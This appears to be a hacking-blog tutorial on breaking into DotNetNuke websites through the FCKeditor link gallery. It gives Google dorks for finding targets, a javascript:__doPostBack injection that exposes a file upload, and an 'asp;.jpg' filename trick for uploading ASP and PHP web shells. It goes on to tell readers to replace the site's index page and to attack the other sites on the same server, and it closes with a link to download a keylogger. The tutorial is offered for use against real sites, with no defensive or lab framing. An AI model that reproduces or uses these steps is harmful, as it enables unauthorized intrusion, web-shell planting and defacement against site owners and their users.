Yet I have explained following tutorials about Website Hacking
- Complete HACKING information for Newbies
- Basic Information About Website Hacking
- How to find a vulnerable Website??
- BASIC XSS TUTORIAL FOR WEBSITE HACKING
- Cross Site Request Forgery (CSRF/XSRF) Tutorial
- The Cross-Site Request Forgery (CSRF/XSRF) FAQ
- Remote File Inclusion Tutorial For Website Hacking
- How to Protect WordPress Website From Hackers
- Hack Websites Database Using XPath Injection
- Web Hacking FAQ : Common Web Hacking Problems Solutions
- Local File Inclusion Tutorial(LFI) For Website Hacking
- Website Database Hacking : SQL Injection Tools To Hack Website
- How to Hack Website Using Havij SQL Injection
- How To Find Vulnerable Website Using SQL Poizon (Sqli Exploit Scanner) Tool
ok..now come to topic...
What is DNN (Dot Net Nuke) ?
Step 1: First go to google.com search page and use this following dork to find vulnerable site.
inurl:home/tabid/36/language/en-US/Default.aspx
another dorks you can use
inurl:fcklinkgallery.aspx
inurl:/portals/0
Step 2: Now open any site from the search list like
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
Now replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your url will become
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
then hit enter
Step 3: Now there are 2 possibilities
if u get Link Gallery url select then site is not vulnerable , see the image below
and If you get Like shown in below image then target is vulnerable
ok now if you find a vulnerable site move to next step
Step 4: Now you can see 3 options there and we neeed to select “File in your site”.
Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .
Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.
Step 7: Now you have to upload your shell.
Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg
So for this purpose first we need to upload a special type of shell which is specially coded in asp.
Download the shell :- For more ASP shell goto www.sh3ll.org .
Now rename your asp shell to
yourshell.asp;.jpg
and upload it.
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
Step 8: Now upload your php shell using upload file option marked in above image.
After uploading php shell you can access it by going to this address,
http://www.vulsite.com/portals/0/yourphpshell.php
Step 9: Now replace your index.html with original index.html. Thats it.
Well you can also hack all sites which are hosted on same server.
For that follow the bellow image and click on Drives you will find all sites hosted on same server.
Click on any one site and follow the above process to upload you shell.
Happy website hacking!!!
Filed Under: Website Hacking
Click Here To Download Winspy Keylogger